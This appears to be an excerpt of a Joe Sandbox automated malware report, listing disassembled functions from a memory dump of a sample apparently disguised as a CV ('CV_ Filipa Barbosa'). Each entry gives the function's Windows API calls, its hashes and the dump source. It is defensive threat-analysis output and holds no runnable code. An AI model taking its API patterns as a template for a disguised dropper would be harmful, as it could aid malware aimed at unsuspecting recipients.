GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 002F436B

Strings

Wow64DisableWow64FsRedirection, xrefs: 002F4365
kernel32.dll, xrefs: 002F4354

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: a476d95cefc43a7f68daa038bc2366b4982d47c17103fa7c04f4c62f360c5ec0
Instruction ID: ab61278cee8bc4f2ec3319d725ad24a9bb51e2959cec2038c0e6298a9b42e019
Opcode Fuzzy Hash: a476d95cefc43a7f68daa038bc2366b4982d47c17103fa7c04f4c62f360c5ec0
Instruction Fuzzy Hash: 13D05E304147179EC7225F34A808A53B6E8AF21715F114469E896D2150D7B0D8C08710

Function 00330539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,0033051D,?,003305FE), ref: 00330547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00330559

Strings

oleaut32.dll, xrefs: 00330542
RegisterTypeLibForUser, xrefs: 00330553

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: eb03c17521f2ee8da47878502e7778550e21cd63186b39e98ce84e6f93651171
Instruction ID: 598b1cfd66d885075c8537067eec5a08d7755c20e74613ead85f32589c446495
Opcode Fuzzy Hash: eb03c17521f2ee8da47878502e7778550e21cd63186b39e98ce84e6f93651171
Instruction Fuzzy Hash: A8D0A7304047129FD7328F25E84864677F8EF02311F51C41DE44BD2150D674C8C0CA10

Function 00330564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0033052F,?,003306D7), ref: 00330572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00330584

Strings

UnRegisterTypeLibForUser, xrefs: 0033057E
oleaut32.dll, xrefs: 0033056D

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 9adee3a8b4d050ba3a27345f33b72ee4ac6fdac4d700c29643c280c1312d5c56
Instruction ID: ef9f1b5bb4875fe412a28dac594466fb48d47246cb5d5f4506118e2fe5d0ca20
Opcode Fuzzy Hash: 9adee3a8b4d050ba3a27345f33b72ee4ac6fdac4d700c29643c280c1312d5c56
Instruction Fuzzy Hash: E2D0A7315047129FD7325F34E888B4377F8EF06311F51841DE846D2150D770C4C0CA20

Function 0034ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0034ECBE,?,0034EBBB), ref: 0034ECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0034ECE8

Strings

GetSystemWow64DirectoryW, xrefs: 0034ECE2
kernel32.dll, xrefs: 0034ECD1

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: c5b735dc0dde4729ca6189f69b4129635e212e753849e987b8ab185c6b43af84
Instruction ID: 47f3bf1169967cdaf342b63d74fb33199d58ed18aa5d21005c922c4e78fafe9f
Opcode Fuzzy Hash: c5b735dc0dde4729ca6189f69b4129635e212e753849e987b8ab185c6b43af84
Instruction Fuzzy Hash: C0D05E304047239ECB225B65A88864276E8AF05310F018419E84A92191DAB0D8C09610

Function 0034BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,0034BAD3,00000001,0034B6EE,?,0038DC00), ref: 0034BAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0034BAFD

Strings

GetModuleHandleExW, xrefs: 0034BAF7
kernel32.dll, xrefs: 0034BAE6

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: cef4363aff21dce3e0ec67593eac781d6fd26bde993aa404e3ba7a3a9e6922dd
Instruction ID: a0f4e55a780d5f95f3af3de8ee7f60395a3e5c7ea0ed9c5503df2afe0720e880
Opcode Fuzzy Hash: cef4363aff21dce3e0ec67593eac781d6fd26bde993aa404e3ba7a3a9e6922dd
Instruction Fuzzy Hash: 61D0A9308047129FCB339F24E848B92B7E8EF01310F01842AE88BE2250EBB0E8C0CB10

Function 00353BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00353BD1,?,00353E06), ref: 00353BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00353BFB

Strings

RegDeleteKeyExW, xrefs: 00353BF5
advapi32.dll, xrefs: 00353BE4

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 401967aa3a97f437e78107c15a82879c70898f3486f44332bd7c3c8fa1ae6c71
Instruction ID: cc39c6d3d490dfc2d4b2d0329ffaa14e4b2d6a1f9c6c6290c3a5104838186b5b
Opcode Fuzzy Hash: 401967aa3a97f437e78107c15a82879c70898f3486f44332bd7c3c8fa1ae6c71
Instruction Fuzzy Hash: 41D05E70500752DAC7225F60A808A86BAB8AF02325F114469E84AA2160D6B0C4848A10

Function 00329B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6f7a2ed54c16c6f136828d0f2f070beb262c0217d0021b872738570bb3aecc7
Instruction ID: 5cedd2ddd1d88689a31e519b5c9ba1acc310a232ef2f3d21b5304ca06793dea5
Opcode Fuzzy Hash: b6f7a2ed54c16c6f136828d0f2f070beb262c0217d0021b872738570bb3aecc7
Instruction Fuzzy Hash: C3C17D75A0022AEFCB15CF94D884BAEB7B9FF48700F11459AE805AF251D730DE81DBA0

Function 0034AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0034AAB4
CoUninitialize.OLE32 ref: 0034AABF

Part of subcall function 00330213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0033027B

VariantInit.OLEAUT32(?), ref: 0034AACA
VariantClear.OLEAUT32(?), ref: 0034AD9D

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 18418021a21055e03b65c86a5fda9c0e0eb962efcd2196d447c9d8f6ab23af07
Instruction ID: d1d3613a05ec349e5058a3b78316b6b6bd4b1ff6e3398ea412a03b39553750d9
Opcode Fuzzy Hash: 18418021a21055e03b65c86a5fda9c0e0eb962efcd2196d447c9d8f6ab23af07
Instruction Fuzzy Hash: 76A12535644B019FCB12EF14C491B2AB7E9BF89750F044459FA9A9B3A2CB30FD44CB86

Function 003291CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003291DD
SysAllocString.OLEAUT32(?), ref: 00329286
VariantCopy.OLEAUT32 ref: 003292B5
VariantClear.OLEAUT32(?), ref: 003292DC

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: d416fb4436b09df7432f93df4ab78d1e7ae7075bb2bd77628957940d26632007
Instruction ID: 634885697af3e36435ba3e4f796092c865542f8adcf159f114c2d812f9dd5162
Opcode Fuzzy Hash: d416fb4436b09df7432f93df4ab78d1e7ae7075bb2bd77628957940d26632007
Instruction Fuzzy Hash: 4C51A434604316DBDB36EF66E495B2EB3E9EF48314F20881FE686CB6D1DB7498808705

Function 0031365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 003136B7
_memcpy_s.LIBCMT ref: 00313729
__filbuf.LIBCMT ref: 003137AA
_memset.LIBCMT ref: 003137EE

Part of subcall function 00317C0E: __getptd_noexit.LIBCMT ref: 00317C0E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction ID: f63a8837a0a0ab88fc4d1c587c3bc9243278f1b3b8f1083ca6e7fa4a96894418
Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction Fuzzy Hash: 0551A7B0A00305EBDB2E8F6988855EEB7B5AF48320F258729F835966D0D7719FD48B50

Function 0035C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(01176DC0,?), ref: 0035C544
ScreenToClient.USER32(?,00000002), ref: 0035C574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0035C5DA

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: b6bb8fa94f7b8c8cf4368c337e435277b0d318fa556789766dabd444a1b9a818
Instruction ID: af34f1cce4099c64f3f981388aab10a43862a0ffdfe6804231fb30a988667ec2
Opcode Fuzzy Hash: b6bb8fa94f7b8c8cf4368c337e435277b0d318fa556789766dabd444a1b9a818
Instruction Fuzzy Hash: 68519E74910204AFCF22CF68C880EAE77B5EF45729F259659FD159B2A0D730ED85CB90

Function 0032C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0032C462
__itow.LIBCMT ref: 0032C49C

Part of subcall function 0032C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0032C753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0032C505
__itow.LIBCMT ref: 0032C55A

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: cd4fd8e43471b7f40e043324b5e13f101a7129f34ea7cec4c7aef0081f8db4f0
Instruction ID: 55fe99c0a8f54a54bdd3ec767851c9e5c9dc3adcec3997438e516ff191ff5441
Opcode Fuzzy Hash: cd4fd8e43471b7f40e043324b5e13f101a7129f34ea7cec4c7aef0081f8db4f0
Instruction Fuzzy Hash: A141E531A1061CABDF26EF54D851FFFBBB9AF49740F000029FA05A7181DB74AA558F91

Function 0033390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00333966
SetKeyboardState.USER32(00000080,?,00000001), ref: 00333982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003339EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00333A4D

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2c30b58f61661e0504fd9560e6e54524ee7928047b93be1ce0e7466ce46d75cf
Instruction ID: 5f13e0161e010691bb25f707528d932ac7fd1a21beb7a89fd81bb8f6bccfeaf4
Opcode Fuzzy Hash: 2c30b58f61661e0504fd9560e6e54524ee7928047b93be1ce0e7466ce46d75cf
Instruction Fuzzy Hash: 13412970E04208EEEF328B648886BFDBBB99F45311F04815AF4C1961D1C7B48E85D765

Function 0033E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0033E742
GetLastError.KERNEL32(?,00000000), ref: 0033E768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0033E78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0033E7B9

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 365e15500e180ba98ed8981249eab8a175faf9c0548cc007667e93ca08913083
Instruction ID: b6f2c3cd091e201270b3f8c94969ee9e81d5ca3a9b52deb97d6e2c6fde107b95
Opcode Fuzzy Hash: 365e15500e180ba98ed8981249eab8a175faf9c0548cc007667e93ca08913083
Instruction Fuzzy Hash: 624125392006149FCB12EF55C485A5DBBE5BF59710F098498EA0AAB3A2CB30FC408F91

Function 0035B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0035B5D1

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 234f77de59fb5d7912af9521a3f4bf11f39cacd75ebd993e02f9446d94065216
Instruction ID: b5b94da80291c820d4f05b8b1452411c01bbd627b57edf86ca4a737336455938
Opcode Fuzzy Hash: 234f77de59fb5d7912af9521a3f4bf11f39cacd75ebd993e02f9446d94065216
Instruction Fuzzy Hash: BC31C274601208BFEF3B9F18CC85FA8F769AB06352FA54901FE51D65F1D730A9888B91

Function 0035D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0035D807
GetWindowRect.USER32(?,?), ref: 0035D87D
PtInRect.USER32(?,?,0035ED5A), ref: 0035D88D
MessageBeep.USER32(00000000), ref: 0035D8FE

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 6fb03be95ddbe57749df78ce575ec1b03f2daebfe3a905a07c859556f4a16fdc
Instruction ID: 57df351ef03aabcbaf1c4d23782247f06c4bcd522684db1f3974b6fd473c53df
Opcode Fuzzy Hash: 6fb03be95ddbe57749df78ce575ec1b03f2daebfe3a905a07c859556f4a16fdc
Instruction Fuzzy Hash: 42414774A00219DFCB22DF59D884FA9BBF9BB49316F1981A9ED149F270D730A949CB40

Function 00333A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00333AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00333AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00333B34
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00333B92

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: a1315a254da09715725bb0509856ba3265f6a1abc120917d14564d714a76cde3
Instruction ID: 184ffcd9f462d3e0f63ff9b582fc4828ac1ea4a33d4433ca4e9df0deecabe5a8
Opcode Fuzzy Hash: a1315a254da09715725bb0509856ba3265f6a1abc120917d14564d714a76cde3
Instruction Fuzzy Hash: 16314630A04258AEEF338B648899BFEFBB99F45321F05815AE485972D1C7748F85C761

Function 00324004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00324038
__isleadbyte_l.LIBCMT ref: 00324066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00324094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003240CA

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 4a168b9c059f5cc47b197db41acb8de5ccd348adfb9f4660c1b4306da9beef88
Instruction ID: e5750f50c55c9c7a0535694db23cc75f27c241470de4176b6e0cdf2028d8a57b
Opcode Fuzzy Hash: 4a168b9c059f5cc47b197db41acb8de5ccd348adfb9f4660c1b4306da9beef88
Instruction Fuzzy Hash: 9131B231600226EFDB23DF74D845BAABBB9FF44310F168429EA658B190E731D8D1DB90

Function 00357CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00357CB9

